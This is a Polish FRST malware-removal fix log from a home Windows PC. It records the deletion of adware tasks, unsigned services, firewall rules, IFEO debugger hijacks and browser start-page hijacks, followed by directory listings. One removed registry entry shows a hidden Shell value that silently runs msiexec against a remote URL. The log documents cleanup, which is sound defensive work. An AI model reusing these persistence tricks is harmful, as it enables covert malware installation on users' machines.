Rezultat naprawy Farbar Recovery Scan Tool (x64) Wersja: 15-06-2017 01 Uruchomiony przez Karina (17-06-2017 20:04:00) Run:1 Uruchomiony z C:\Users\Karina\Downloads Załadowane profile: Karina (Dostępne profile: Karina & Gość) Tryb startu: Normal ============================================== fixlist - zawartość: ***************** CloseProcesses: CreateRestorePoint: HKU\S-1-5-21-1638026617-3475964013-2229430397-1000\...\ChromeHTML: -> C:\Program Files (x86)\Doeye\Application\chrome.exe (Google Inc.) <==== UWAGA RemoveDirectory: C:\Program Files (x86)\Doeye RemoveDirectory: C:\Users\Karina\AppData\Roaming\Doeye RemoveDirectory: C:\Users\Karina\AppData\Local\Doeye HKU\S-1-5-21-1638026617-3475964013-2229430397-1000\...\ChromeHTML: -> C:\Program Files (x86)\Doeye\Application\chrome.exe (Google Inc.) <==== UWAGA Task: {13690C54-20FE-49E5-A944-39D79AD0407A} - \Windows-WoShiBeiYongDe -> Brak pliku <==== UWAGA Task: {46A26F52-4E73-4BCB-B637-FFD9196D3FEB} - System32\Tasks\{3E25F6F0-6803-4AAC-B178-F396B088A027} => pcalua.exe -a F:\AHDETH-00244228-0042.EXE -d F:\ Task: {BF80DEA7-CCB8-44B0-B7CA-5782941C5169} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-05-17] () <==== UWAGA Task: {C51E8FD3-3718-403F-9F81-412FE2398FFB} - System32\Tasks\{A9A47BEE-1E85-4D3D-B0C7-052BA71A97AC} => pcalua.exe -a F:\AHDETH-00244228-0042.EXE -d F:\ Task: {C819146A-746A-4407-AC0D-60656A2D87CE} - \PowerWord-SCT-JT -> Brak pliku <==== UWAGA RemoveDirectory: C:\Program Files (x86)\MIO ShortcutWithArgument: C:\Users\Karina\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1495644570&z=91de134c1d6e8157ba43528g7z0t3wbq6z3z0wamee&from=che0812&uid=TOSHIBAXMK6459GSXP_Z1I3S3J5SXXZ1I3S3J5S C:\Users\Karina\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk C:\Users\Karina\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk C:\Users\Karina\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Mozilla Firefox.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk C:\Users\Public\Desktop\Mozilla Firefox.lnk FirewallRules: [{1E2ED7E9-AFC7-4C03-8527-833431621303}] => (Allow) C:\Program Files (x86)\Doeye\Application\chrome.exe FirewallRules: [{DB9613CB-AD37-472E-B87A-F92D20075629}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe FirewallRules: [{4AB25F3B-02D3-49F3-8ED0-70762CA84090}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe FirewallRules: [{D9BA6956-3BF0-46BA-849B-E07952409818}] => (Allow) C:\Program Files (x86)\MIO\loader\toshibaxmk6459gsxp_z1i3s3j5sxxz1i3s3j5s.dat FirewallRules: [{A40AE860-8FA6-4F17-87E1-2C71CE084CE8}] => (Allow) C:\Program Files (x86)\MIO\loader\toshibaxmk6459gsxp_z1i3s3j5sxxz1i3s3j5s.dat RemoveDirectory: C:\Program Files (x86)\Firefox RemoveDirectory: C:\Users\Karina\AppData\Roaming\Firefox RemoveDirectory: C:\Users\Karina\AppData\Local\Firefox HKU\S-1-5-21-1638026617-3475964013-2229430397-1000\...\Run: [background_fault] => HKU\S-1-5-21-1638026617-3475964013-2229430397-1000\...\Run: [background_fault] => C:\Users\Karina\AppData\Local\background_fault\aswRD.exe [1419576 2017-05-09] (AVAST Software) <===== UWAGA C:\Users\Karina\AppData\Local\background_fault HKU\S-1-5-21-1638026617-3475964013-2229430397-1000\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i hxxp://point.orangeiloveyou.com/?data=zDlkMj83MUM4NYVWRjRYFTF5OTRWOWzLFjQLFdk1NdH1RjVYFq== /q IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe IFEO\taskmgr.exe: [Debugger] HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1494341017&z=db9922b5cba92e6ab408e73g9zft0z5cdzagde0gbb&from=che0812&uid=TOSHIBAXMK6459GSXP_Z1I3S3J5SXXZ1I3S3J5S HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1494341017&z=db9922b5cba92e6ab408e73g9zft0z5cdzagde0gbb&from=che0812&uid=TOSHIBAXMK6459GSXP_Z1I3S3J5SXXZ1I3S3J5S HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://myhome.vi-view.com/web/?type=ds&ts=1418157036&from=cor&uid=TOSHIBAXMK6459GSXP_Z1I3S3J5SXXZ1I3S3J5S&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://myhome.vi-view.com/web/?type=ds&ts=1418157036&from=cor&uid=TOSHIBAXMK6459GSXP_Z1I3S3J5SXXZ1I3S3J5S&q={searchTerms} HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1494341017&z=db9922b5cba92e6ab408e73g9zft0z5cdzagde0gbb&from=che0812&uid=TOSHIBAXMK6459GSXP_Z1I3S3J5SXXZ1I3S3J5S HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1494341017&z=db9922b5cba92e6ab408e73g9zft0z5cdzagde0gbb&from=che0812&uid=TOSHIBAXMK6459GSXP_Z1I3S3J5SXXZ1I3S3J5S HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://myhome.vi-view.com/web/?type=ds&ts=1418157036&from=cor&uid=TOSHIBAXMK6459GSXP_Z1I3S3J5SXXZ1I3S3J5S&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://myhome.vi-view.com/web/?type=ds&ts=1418157036&from=cor&uid=TOSHIBAXMK6459GSXP_Z1I3S3J5SXXZ1I3S3J5S&q={searchTerms} HKU\S-1-5-21-1638026617-3475964013-2229430397-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1494341017&z=db9922b5cba92e6ab408e73g9zft0z5cdzagde0gbb&from=che0812&uid=TOSHIBAXMK6459GSXP_Z1I3S3J5SXXZ1I3S3J5S&q={searchTerms} HKU\S-1-5-21-1638026617-3475964013-2229430397-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1494341017&z=db9922b5cba92e6ab408e73g9zft0z5cdzagde0gbb&from=che0812&uid=TOSHIBAXMK6459GSXP_Z1I3S3J5SXXZ1I3S3J5S HKU\S-1-5-21-1638026617-3475964013-2229430397-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1494341017&z=db9922b5cba92e6ab408e73g9zft0z5cdzagde0gbb&from=che0812&uid=TOSHIBAXMK6459GSXP_Z1I3S3J5SXXZ1I3S3J5S HKU\S-1-5-21-1638026617-3475964013-2229430397-1000\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1494341017&z=db9922b5cba92e6ab408e73g9zft0z5cdzagde0gbb&from=che0812&uid=TOSHIBAXMK6459GSXP_Z1I3S3J5SXXZ1I3S3J5S&q={searchTerms} SearchScopes: HKU\S-1-5-21-1638026617-3475964013-2229430397-1000 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1494341017&z=db9922b5cba92e6ab408e73g9zft0z5cdzagde0gbb&from=che0812&uid=TOSHIBAXMK6459GSXP_Z1I3S3J5SXXZ1I3S3J5S&q={searchTerms} SearchScopes: HKU\S-1-5-21-1638026617-3475964013-2229430397-1000 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1494341017&z=db9922b5cba92e6ab408e73g9zft0z5cdzagde0gbb&from=che0812&uid=TOSHIBAXMK6459GSXP_Z1I3S3J5SXXZ1I3S3J5S&q={searchTerms} FF HKLM-x32\...\Firefox\Extensions: [arthurj8283@gmail.com] - C:\Users\Karina\AppData\Roaming\Mozilla\Firefox\Profiles\v9t3imds.default-1449957172719\extensions\arthurj8283@gmail.com CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files (x86)\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll Brak pliku S4 ANSARE; C:\Users\Karina\AppData\Local\ANSARE\Snare.dll [826368 2017-05-24] () [Brak podpisu cyfrowego] <==== UWAGA R2 AppleCloudSvc; C:\ProgramData\Apple\Common\Cloud\WinHelper.dll [110592 2017-04-24] () [Brak podpisu cyfrowego] <==== UWAGA R2 BIT; C:\ProgramData\BIT\BIT.dll [1812992 2017-05-31] (TODO: <公司名>) [Brak podpisu cyfrowego] <==== UWAGA R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [99480 2017-05-26] () <==== UWAGA S4 NPASRE; C:\Users\Karina\AppData\Local\NPASRE\Snare.dll [830464 2017-05-24] () [Brak podpisu cyfrowego] <==== UWAGA S2 terana; C:\Users\Karina\AppData\Local\terana\terana.dll [909312 2017-05-31] (IntertSect Alliance Pty Ltd) [Brak podpisu cyfrowego] <==== UWAGA S4 VNASRE; C:\Users\Karina\AppData\Local\VNASRE\Snare.dll [826368 2017-05-24] () [Brak podpisu cyfrowego] <==== UWAGA C:\Users\Karina\AppData\Local\ANSARE C:\ProgramData\Apple C:\ProgramData\BIT C:\Users\Karina\AppData\Local\NPASRE C:\Users\Karina\AppData\Local\terana S1 ccnfd_1_10_0_4; system32\drivers\ccnfd_1_10_0_4.sys [X] S1 iSafeKrnlMon; \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [X] <==== UWAGA C:\Program Files (x86)\Elex-tech 2017-05-27 17:57 - 2017-05-27 17:57 - 00000000 _____ C:\Windows\SysWOW64\55 2017-05-27 17:57 - 2017-04-25 13:05 - 00000000 _____ C:\Windows\SysWOW64\33 2017-05-27 17:56 - 2017-05-13 01:13 - 00000000 _____ C:\Windows\SysWOW64\00 2017-05-27 17:56 - 2017-05-09 22:49 - 00000000 _____ C:\Windows\SysWOW64\1111 2017-05-27 17:56 - 2017-04-25 13:05 - 00000000 _____ C:\Windows\SysWOW64\11 2017-05-27 17:56 - 2017-04-25 13:00 - 00000000 ____D C:\Program Files (x86)\BiaoJi C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Photo Gallery.lnk C:\Users\Karina\AppData\Roaming\Microsoft\Office\Niedawny\Nowy dokument sformatowany (2).LNK C:\Users\Karina\Desktop\BigFarm.lnk C:\Users\Karina\Desktop\big_bang_empire.lnk C:\Users\Karina\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\BigFarm.lnk C:\Users\Karina\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\big_bang_empire.lnk DeleteKey: HKCU\Software\Doeye DeleteKey: HKCU\Software\Firefox DeleteKey: HKLM\SOFTWARE\WOW6432Node\Doeye DeleteKey: HKLM\SOFTWARE\WOW6432Node\Firefox DeleteKey: HKU\S-1-5-18\Software\Microsoft\Internet Explorer\Main DeleteKey: HKU\S-1-5-19\Software\Microsoft\Internet Explorer\Main DeleteKey: HKU\S-1-5-20\Software\Microsoft\Internet Explorer\Main DeleteKey: HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes DeleteKey: HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes DeleteKey: HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes CMD: dir /a "C:\Program Files" CMD: dir /a "C:\Program Files (x86)" CMD: dir /a "C:\Program Files\Common Files\System" CMD: dir /a "C:\Program Files (x86)\Common Files\System" CMD: dir /a C:\ProgramData CMD: dir /a C:\Users\Karina\AppData\Local CMD: dir /a C:\Users\Karina\AppData\LocalLow CMD: dir /a C:\Users\Karina\AppData\Roaming EmptyTemp: ***************** Procesy zostały pomyślnie zamknięte. Punkt przywracania został pomyślnie utworzony. HKU\S-1-5-21-1638026617-3475964013-2229430397-1000_Classes\ChromeHTML => klucz pomyślnie usunięto "C:\Program Files (x86)\Doeye" => pomyślnie usunięto. "C:\Users\Karina\AppData\Roaming\Doeye" => nie znaleziono. "C:\Users\Karina\AppData\Local\Doeye" => pomyślnie usunięto. HKU\S-1-5-21-1638026617-3475964013-2229430397-1000_Classes\ChromeHTML => klucz nie znaleziono. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{13690C54-20FE-49E5-A944-39D79AD0407A} => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{13690C54-20FE-49E5-A944-39D79AD0407A} => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Windows-WoShiBeiYongDe => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{46A26F52-4E73-4BCB-B637-FFD9196D3FEB} => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{46A26F52-4E73-4BCB-B637-FFD9196D3FEB} => klucz pomyślnie usunięto C:\Windows\System32\Tasks\{3E25F6F0-6803-4AAC-B178-F396B088A027} => pomyślnie przeniesiono HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{3E25F6F0-6803-4AAC-B178-F396B088A027} => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{BF80DEA7-CCB8-44B0-B7CA-5782941C5169} => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{BF80DEA7-CCB8-44B0-B7CA-5782941C5169} => klucz pomyślnie usunięto C:\Windows\System32\Tasks\Milimili => pomyślnie przeniesiono HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Milimili => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{C51E8FD3-3718-403F-9F81-412FE2398FFB} => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C51E8FD3-3718-403F-9F81-412FE2398FFB} => klucz pomyślnie usunięto C:\Windows\System32\Tasks\{A9A47BEE-1E85-4D3D-B0C7-052BA71A97AC} => pomyślnie przeniesiono HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{A9A47BEE-1E85-4D3D-B0C7-052BA71A97AC} => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{C819146A-746A-4407-AC0D-60656A2D87CE} => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C819146A-746A-4407-AC0D-60656A2D87CE} => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\PowerWord-SCT-JT => klucz pomyślnie usunięto "C:\Program Files (x86)\MIO" => pomyślnie usunięto. C:\Users\Karina\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk => Skrót - argument pomyślnie przywrócono C:\Users\Karina\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk => pomyślnie przeniesiono C:\Users\Karina\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk => pomyślnie przeniesiono C:\Users\Karina\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Mozilla Firefox.lnk => pomyślnie przeniesiono C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk => pomyślnie przeniesiono C:\Users\Public\Desktop\Mozilla Firefox.lnk => pomyślnie przeniesiono HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{1E2ED7E9-AFC7-4C03-8527-833431621303} => Wartość pomyślnie usunięto HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{DB9613CB-AD37-472E-B87A-F92D20075629} => Wartość pomyślnie usunięto HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{4AB25F3B-02D3-49F3-8ED0-70762CA84090} => Wartość pomyślnie usunięto HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{D9BA6956-3BF0-46BA-849B-E07952409818} => Wartość pomyślnie usunięto HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{A40AE860-8FA6-4F17-87E1-2C71CE084CE8} => Wartość pomyślnie usunięto "C:\Program Files (x86)\Firefox" => pomyślnie usunięto. "C:\Users\Karina\AppData\Roaming\Firefox" => pomyślnie usunięto. "C:\Users\Karina\AppData\Local\Firefox" => pomyślnie usunięto. HKU\S-1-5-21-1638026617-3475964013-2229430397-1000\Software\Microsoft\Windows\CurrentVersion\Run\\background_fault => Wartość pomyślnie usunięto C:\Users\Karina\AppData\Local\background_fault => pomyślnie przeniesiono HKU\S-1-5-21-1638026617-3475964013-2229430397-1000\Software\Microsoft\Windows\CurrentVersion\Policies\system\\Shell => Wartość pomyślnie usunięto HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\GoogleUpdate.exe => klucz pomyślnie usunięto HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\GoogleUpdaterService.exe => klucz pomyślnie usunięto HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\taskmgr.exe => klucz pomyślnie usunięto HKLM\Software\\Microsoft\Internet Explorer\Main\\Start Page => Wartość pomyślnie przywrócono HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Start Page => Wartość pomyślnie przywrócono HKLM\Software\\Microsoft\Internet Explorer\Main\\Search Page => Wartość pomyślnie przywrócono HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Search Page => Wartość pomyślnie przywrócono HKLM\Software\\Microsoft\Internet Explorer\Main\\Default_Page_URL => Wartość pomyślnie przywrócono HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Default_Page_URL => Wartość pomyślnie przywrócono HKLM\Software\\Microsoft\Internet Explorer\Main\\Default_Search_URL => Wartość pomyślnie przywrócono HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Default_Search_URL => Wartość pomyślnie przywrócono HKU\S-1-5-21-1638026617-3475964013-2229430397-1000\Software\Microsoft\Internet Explorer\Main\\Search Page => Wartość pomyślnie przywrócono HKU\S-1-5-21-1638026617-3475964013-2229430397-1000\Software\Microsoft\Internet Explorer\Main\\Start Page => Wartość pomyślnie przywrócono HKU\S-1-5-21-1638026617-3475964013-2229430397-1000\Software\Microsoft\Internet Explorer\Main\\Default_Page_URL => Wartość pomyślnie przywrócono HKU\S-1-5-21-1638026617-3475964013-2229430397-1000\Software\Microsoft\Internet Explorer\Main\\Default_Search_URL => Wartość pomyślnie przywrócono HKU\S-1-5-21-1638026617-3475964013-2229430397-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => Wartość pomyślnie usunięto HKU\S-1-5-21-1638026617-3475964013-2229430397-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => klucz pomyślnie usunięto HKLM\Software\Classes\CLSID\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => klucz nie znaleziono. HKLM\Software\Wow6432Node\Mozilla\Firefox\Extensions\\arthurj8283@gmail.com => Wartość pomyślnie usunięto HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\gomekmidlodglbbmalcneegieacbdmki => klucz pomyślnie usunięto HKLM\Software\Classes\PROTOCOLS\Handler\wlpg => klucz pomyślnie usunięto HKLM\Software\Classes\CLSID\{E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} => klucz nie znaleziono. HKLM\System\CurrentControlSet\Services\ANSARE => klucz pomyślnie usunięto ANSARE => serwis pomyślnie usunięto HKLM\System\CurrentControlSet\Services\AppleCloudSvc => klucz pomyślnie usunięto AppleCloudSvc => serwis pomyślnie usunięto BIT => Usługa pomyślnie zatrzymana. HKLM\System\CurrentControlSet\Services\BIT => klucz pomyślnie usunięto BIT => serwis pomyślnie usunięto HKLM\System\CurrentControlSet\Services\FirefoxU => klucz pomyślnie usunięto FirefoxU => serwis pomyślnie usunięto HKLM\System\CurrentControlSet\Services\NPASRE => klucz pomyślnie usunięto NPASRE => serwis pomyślnie usunięto terana => serwis nie znaleziono. HKLM\System\CurrentControlSet\Services\VNASRE => klucz pomyślnie usunięto VNASRE => serwis pomyślnie usunięto C:\Users\Karina\AppData\Local\ANSARE => pomyślnie przeniesiono C:\ProgramData\Apple => pomyślnie przeniesiono C:\ProgramData\BIT => pomyślnie przeniesiono C:\Users\Karina\AppData\Local\NPASRE => pomyślnie przeniesiono C:\Users\Karina\AppData\Local\terana => pomyślnie przeniesiono HKLM\System\CurrentControlSet\Services\ccnfd_1_10_0_4 => klucz pomyślnie usunięto ccnfd_1_10_0_4 => serwis pomyślnie usunięto HKLM\System\CurrentControlSet\Services\iSafeKrnlMon => klucz pomyślnie usunięto iSafeKrnlMon => serwis pomyślnie usunięto "C:\Program Files (x86)\Elex-tech" => nie znaleziono. C:\Windows\SysWOW64\55 => pomyślnie przeniesiono C:\Windows\SysWOW64\33 => pomyślnie przeniesiono C:\Windows\SysWOW64\00 => pomyślnie przeniesiono C:\Windows\SysWOW64\1111 => pomyślnie przeniesiono C:\Windows\SysWOW64\11 => pomyślnie przeniesiono C:\Program Files (x86)\BiaoJi => pomyślnie przeniesiono C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Photo Gallery.lnk => pomyślnie przeniesiono C:\Users\Karina\AppData\Roaming\Microsoft\Office\Niedawny\Nowy dokument sformatowany (2).LNK => pomyślnie przeniesiono C:\Users\Karina\Desktop\BigFarm.lnk => pomyślnie przeniesiono C:\Users\Karina\Desktop\big_bang_empire.lnk => pomyślnie przeniesiono C:\Users\Karina\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\BigFarm.lnk => pomyślnie przeniesiono C:\Users\Karina\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\big_bang_empire.lnk => pomyślnie przeniesiono HKCU\Software\Doeye => klucz pomyślnie usunięto HKCU\Software\Firefox => klucz pomyślnie usunięto HKLM\SOFTWARE\WOW6432Node\Doeye => klucz pomyślnie usunięto HKLM\SOFTWARE\WOW6432Node\Firefox => klucz pomyślnie usunięto HKU\S-1-5-18\Software\Microsoft\Internet Explorer\Main => klucz nie znaleziono. HKU\S-1-5-19\Software\Microsoft\Internet Explorer\Main => klucz pomyślnie usunięto HKU\S-1-5-20\Software\Microsoft\Internet Explorer\Main => klucz pomyślnie usunięto HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes => klucz nie znaleziono. HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes => klucz nie znaleziono. HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes => klucz nie znaleziono. ========= dir /a "C:\Program Files" ========= Wolumin w stacji C nie ma etykiety. Numer seryjny woluminu: C004-8427 Katalog: C:\Program Files 2017-05-09 16:42 . 2017-05-09 16:42 .. 2016-07-12 03:22 AVAST Software 2015-12-04 01:32 Common Files 2009-07-14 06:54 174 desktop.ini 2017-05-21 00:24 DVD Maker 2015-08-17 16:05 Intel 2017-06-16 10:32 Internet Explorer 2009-07-14 20:09 Microsoft Games 2017-06-16 02:47 Microsoft Silverlight 2017-06-01 02:27 MK 2009-07-14 07:32 MSBuild 2009-07-14 07:32 Reference Assemblies 2014-08-27 14:02 Sony 2014-08-27 13:27 Synaptics 2009-07-14 07:09 Uninstall Information 2014-08-28 09:01 Windows Defender 2014-08-27 21:58 Windows Mail 2017-02-26 19:01 Windows Media Player 2014-08-26 23:49 Windows NT 2014-08-27 21:58 Windows Photo Viewer 2014-08-27 21:58 Windows Portable Devices 2014-08-27 21:58 Windows Sidebar 1 plik(˘w) 174 bajt˘w 22 katalog(˘w) 83˙185˙987˙584 bajt˘w wolnych ========= Koniec CMD: ========= ========= dir /a "C:\Program Files (x86)" ========= Wolumin w stacji C nie ma etykiety. Numer seryjny woluminu: C004-8427 Katalog: C:\Program Files (x86) 2017-06-17 20:07 . 2017-06-17 20:07 .. 2017-03-09 19:50 7-Zip 2017-05-09 22:51 AlphaGo 2015-08-17 16:04 Cisco 2017-05-16 23:23 Common Files 2009-07-14 06:54 174 desktop.ini 2015-07-17 12:18 Google 2014-08-27 16:50 InstallShield Installation Information 2015-08-17 16:04 Intel 2017-06-16 10:32 Internet Explorer 2014-12-09 22:46 Microsoft Office 2017-06-16 02:47 Microsoft Silverlight 2014-08-27 09:41 Microsoft.NET 2016-07-12 20:14 Mozilla Firefox 2016-07-12 20:14 Mozilla Maintenance Service 2009-07-14 07:32 MSBuild 2014-12-09 22:45 MSECache 2017-06-15 21:09 Opera 2015-08-17 15:07 PLAY ONLINE 2014-12-22 01:15 PokerStars.EU 2014-08-27 16:50 Realtek 2009-07-14 07:32 Reference Assemblies 2017-03-09 19:44 TeamViewer 2009-07-14 06:57 Uninstall Information 2015-08-03 00:20 VideoLAN 2014-08-28 09:01 Windows Defender 2014-08-27 21:58 Windows Mail 2017-02-26 19:01 Windows Media Player 2009-07-14 07:32 Windows NT 2014-08-27 21:58 Windows Photo Viewer 2014-08-27 21:58 Windows Portable Devices 2014-08-27 21:58 Windows Sidebar 1 plik(˘w) 174 bajt˘w 32 katalog(˘w) 83˙185˙987˙584 bajt˘w wolnych ========= Koniec CMD: ========= ========= dir /a "C:\Program Files\Common Files\System" ========= Wolumin w stacji C nie ma etykiety. Numer seryjny woluminu: C004-8427 Katalog: C:\Program Files\Common Files\System 2014-08-27 21:58 . 2014-08-27 21:58 .. 2017-05-21 00:24 ado 2009-07-14 03:40 29˙184 DirectDB.dll 2009-07-14 19:55 en-US 2017-05-21 00:24 msadc 2014-08-27 21:58 Ole DB 2009-07-14 19:55 pl-PL 2011-10-01 07:45 886˙784 wab32.dll 2009-07-14 03:33 1˙098˙752 wab32res.dll 3 plik(˘w) 2˙014˙720 bajt˘w 7 katalog(˘w) 83˙185˙987˙584 bajt˘w wolnych ========= Koniec CMD: ========= ========= dir /a "C:\Program Files (x86)\Common Files\System" ========= Wolumin w stacji C nie ma etykiety. Numer seryjny woluminu: C004-8427 Katalog: C:\Program Files (x86)\Common Files\System 2014-08-27 21:58 . 2014-08-27 21:58 .. 2017-05-21 00:24 ado 2009-07-14 03:15 24˙064 DirectDB.dll 2009-07-14 19:55 en-US 2017-05-21 00:24 msadc 2017-02-26 19:01 Ole DB 2009-07-14 19:55 pl-PL 2011-10-01 06:37 708˙608 wab32.dll 2009-07-14 03:11 1˙098˙752 wab32res.dll 3 plik(˘w) 1˙831˙424 bajt˘w 7 katalog(˘w) 83˙185˙987˙584 bajt˘w wolnych ========= Koniec CMD: ========= ========= dir /a C:\ProgramData ========= Wolumin w stacji C nie ma etykiety. Numer seryjny woluminu: C004-8427 Katalog: C:\ProgramData 2017-06-17 20:07 . 2017-06-17 20:07 .. 2009-07-14 07:08 Application Data [C:\ProgramData] 2017-03-01 23:29 AVAST Software 2014-08-26 23:49 Dane aplikacji [C:\ProgramData] 2015-08-17 15:07 DatacardService 2009-07-14 07:08 Desktop [C:\Users\Public\Desktop] 2009-07-14 07:08 Documents [C:\Users\Public\Documents] 2014-08-26 23:49 Dokumenty [C:\Users\Public\Documents] 2009-07-14 07:08 Favorites [C:\Users\Public\Favorites] 2015-08-17 16:04 Intel 2014-08-26 23:49 Menu Start [C:\ProgramData\Microsoft\Windows\Start Menu] 2017-05-16 23:23 Microsoft 2016-06-26 21:12 MobileBrServ 2014-08-27 09:10 Mozilla 2015-08-17 16:01 Package Cache 2015-08-17 15:06 PLAY ONLINE 2014-08-26 23:49 Pulpit [C:\Users\Public\Desktop] 2014-08-27 00:05 Roaming 2014-08-27 14:04 Sony Corporation 2009-07-14 07:08 Start Menu [C:\ProgramData\Microsoft\Windows\Start Menu] 2014-08-26 23:49 Szablony [C:\ProgramData\Microsoft\Windows\Templates] 2009-07-14 07:08 Templates 